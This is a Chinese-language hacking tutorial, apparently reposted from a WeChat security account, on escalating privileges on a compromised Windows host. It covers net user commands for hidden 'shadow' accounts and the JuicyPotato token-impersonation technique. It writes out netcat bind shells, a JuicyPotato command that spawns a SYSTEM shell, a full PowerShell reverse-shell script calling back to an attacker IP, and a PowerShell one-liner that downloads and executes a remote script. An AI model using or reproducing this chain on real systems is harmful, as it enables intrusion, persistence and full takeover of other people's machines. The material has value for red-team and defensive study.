权限不够？你不会提权么？

小傻子，今天教你提权

一、Windows用户与组

1、Windows用户的分类

guest：游客账户权限

user：普通用户权限

administrator：管理员用户权限

ststem：机器最高权限

2、用户相关命令

net user//查看有多少用户

net user administrator//查看administrator账户的信息

net user test passwd /add//创建用户设置密码

net user test /del//删除用户

net user test$ passwd /add//隐藏账户，影子用户，需要用管理组才能看到

3、组相关命令

net localgroup//查看有哪些组

net localgroup administrators//查看组中用户

net localgroup testgroup /add//增加组

二、Potalo家族提权

是通过各种方式和在本地NTLM中继承获取system令牌，再模拟令牌执行命令。

NTLM：简单来说，Windows会将密码放置内存中，NTLM hash加密之后，进行比对。

system令牌：用户登录之后，会有一个权限标识，可以比作我们的学生卡，教师卡，登录之后根据你的身份分配卡。

1、提权条件

获取高权限令牌--token

拥有SeImpersonatePrivilege 或 SeAssignPrimaryTokenPrivilege 权限

可以利用whoami /priv命令查看是否有上面两个权限

以下用户拥有SeImpersonatePrivilege权限：

本地管理员账户和本地服务账户

由SCM（服务控制管理器）启动的服务

由组件对象模型 (COM) 基础结构启动的并配置为在特定帐户下运⾏的COM服务器

当用户具有SeImpersonatePrivilege 特权，可以调⽤ CreateProcessWithTokenW 以某

个Token的权限启动新进程。

当⽤户具有 SeAssignPrimaryTokenPrivilege 特权，可以调⽤ CreateProcessAsUserW

以指定⽤户权限启动新进程。

Windows 服务使⽤的登录账号：

NT AUTHORITYSystem
NT AUTHORITYNetwork Service
NT AUTHORITYLocal Service

2、提权方式

1、JuicyPotato

实现原理

通过DCOM 来使服务向攻击者监听的端⼝发起连接并进⾏NTLM认证。

DCOM主要是Windows的一个封装的组件，可以交互通讯，利用这个接口，可以对网络发送请求。

枚举可⽤COM对象的⽅法（获取对应的 CLSID）：

https://github.com/ohpe/juicy-potato/blob/master/CLSID/GetCLSID.ps1

https://github.com/ohpe/juicy-potato/blob/master/Test/test_clsid.bat

它的一个大概的方式，就是需要先获取对应的CLSID

每个dcom都会对应一个CLSID

https://ohpe.it/juicy-potato/CLSID/

实验

环境预设：

win7 -- 账户：bai（⾮administrators组），ip：192.168.195.129，拥有

SeImpersonatePrivilege（身份验证后模拟客户端） 权限。 这个权限正常是服务用户和管理员用户拥有，这里可以强行设置，为了实验

kali -- ip：192.168.195.130

这里首先我们模拟已经利用nc初步链接上了目标

目标端执行：

nc.exe -lvp 999 -e c:windowssystem32cmd.exe

我们这里用一个正向链接

黑客端开启

nc -nv 目标ip 3333

获取到链接之后，可以使用

chcp 65001

修改编码为utf-8

之后我们下一步操作，查找对应的CLSID

查找对应的CLSID

这里我们首先下载

https://github.com/ohpe/juicy-potato/tree/master

这里整个文件包，里面有一个test文件夹

然后我们需要下载juicypotato的exe文件

之后我们需要到CLSID文件夹中找到对应的系统

这里我们目前事win7，我们就需要到win7文件夹下面，复制CLSID.list到test文件夹下，然后再将上面的exe文件也放到test目录下，我们直接通过执行test_clsid.bat来测试

之后下面会有一个result.log文件，这里就是测试之后的日志，我们打开之后找后面事system权限的

然后复制前面的clsid进行测试，直到可用为止

提权

我们可以直接执行命令

JuicyPotato.exe -t * -p C:windowssystem32cmd.exe -l 1337 -c

{03ca98d6-ff5d-49b8-abc6-03dd84127020}

调用出来system权限的cmd框，但是这里仅限于可以远程3389链接的主机，如果我们是纯粹的命令行要怎么办呢，这里我们就需要写一个bat脚本来运行一个nc，去连接到黑客机器来获取权限。我们也可以直接利用这个system权限去运行一个木马程序。

这里我们首先建一个rev.ps1文件，这个文件是powershell的运行文件

function Invoke-PowerShellTcp
{
     [CmdletBinding(DefaultParameterSetName="reverse")] Param(
         [Parameter(Position = 0, Mandatory = $true,ParameterSetName="reverse")]
         [Parameter(Position = 0, Mandatory = $false,ParameterSetName="bind")]
         [String]
         $IPAddress,
 
         [Parameter(Position = 1, Mandatory = $true,ParameterSetName="reverse")]
         [Parameter(Position = 1, Mandatory = $true,ParameterSetName="bind")]
         [Int]
         $Port,
         
         [Parameter(ParameterSetName="reverse")]
         [Switch]
         $Reverse,
         
         [Parameter(ParameterSetName="bind")]
         [Switch]
         $Bind
 )
 
 try
 {
     #Connect back if the reverse switch is used.
     if ($Reverse)
     {
         $client = New-Object
         System.Net.Sockets.TCPClient($IPAddress,$Port)
     }
     #Bind to the provided port if Bind switch is used.
     if ($Bind)
     {
         $listener = [System.Net.Sockets.TcpListener]$Port
         $listener.start() 
         $client = $listener.AcceptTcpClient()
     }
     $stream = $client.GetStream()
     [byte[]]$bytes = 0..65535|%{0}
     #Send back current username and computername

     $sendbytes = ([text.encoding]::ASCII).GetBytes("WindowsPowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) 2015 Microsoft Corporation. All rights reserved.`n`n")
     $stream.Write($sendbytes,0,$sendbytes.Length)

     #Show an interactive PowerShell prompt
     $sendbytes = ([text.encoding]::ASCII).GetBytes('PS ' + (Get锟綥ocation).Path + '>')
     $stream.Write($sendbytes,0,$sendbytes.Length)
     while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
     {
         $EncodedText = New-Object -TypeNameSystem.Text.ASCIIEncoding
         $data = $EncodedText.GetString($bytes,0, $i)
         try
         {
             #Execute the command on the target.
             $sendback = (Invoke-Expression -Command $data 2>&1 | Out-String )
         }
         catch
         {
             Write-Warning "Something went wrong with execution of command on the target."
             Write-Error $_
         }
             $sendback2 = $sendback + 'PS ' + (Get-Location).Path + '> '
             $x = ($error[0] | Out-String)
             $error.clear()
             $sendback2 = $sendback2 + $x

             #Return the results
             $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
             $stream.Write($sendbyte,0,$sendbyte.Length)
             $stream.Flush() 
         }
         $client.Close()
         if ($listener)
         {
             $listener.Stop()
         }
     }
     catch
     {
         Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port."
         Write-Error $_
     }
}
Invoke-PowerShellTcp -Reverse -IPAddress 192.168.195.130 -Port 9999

上面文件最后一样就是我们要连接的黑客机器的地址

然后我们需要新建一个rev.bat文件来运行这个powershell文件

Powershell -executionpolicy unrestricted "IEX(New-Object Net.WebClient).DownloadString('http://172. 16.42.1/Rev.psl')"

我们这里就需要将ps1文件挂到服务器之类上面，提供远程下载，这样最后我们就可以以system权限，利用nc连接上

服务器开启远程下载

我这里使用bat文件

Powershell -executionpolicy unrestricted "c:nc.exe -lvp 9999 -e c:windowssystem32cmd.exe"

运行之后使用kali接收即可

原文始发于微信公众号（白安全组）：护网问题之——Windows入侵之后权限不够怎么办